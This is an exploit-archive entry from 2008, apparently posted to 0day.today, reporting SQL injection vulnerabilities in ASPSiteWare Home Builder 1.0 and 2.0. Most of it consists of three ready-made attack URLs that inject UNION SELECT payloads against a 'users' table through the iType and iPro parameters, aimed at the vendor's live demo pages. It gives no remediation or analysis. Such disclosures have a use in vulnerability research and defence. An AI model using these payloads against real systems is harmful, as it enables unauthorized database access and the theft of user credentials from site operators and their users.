id: 4452
date: 12/14/2008
title: ASPSiteWare Home Builder 1.0/2.0 SQL Injection Vulnerability
author: AlpHaNiX
cves: 

============================================================
ASPSiteWare Home Builder 1.0/2.0 SQL Injection Vulnerability
============================================================


###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX

###########################################################################

#script   : Home Builder V1.0 / V2.0
#download : null
#Demo     : http://www.aspsiteware.com/Home1/
	    http://www.aspsiteware.com/home2/home2/


###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://www.aspsiteware.com/Home1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.aspsiteware.com/home2/home2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.aspsiteware.com/home2/home2/type2.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users

###########################################################################



#  0day.today [2023-03-22]  #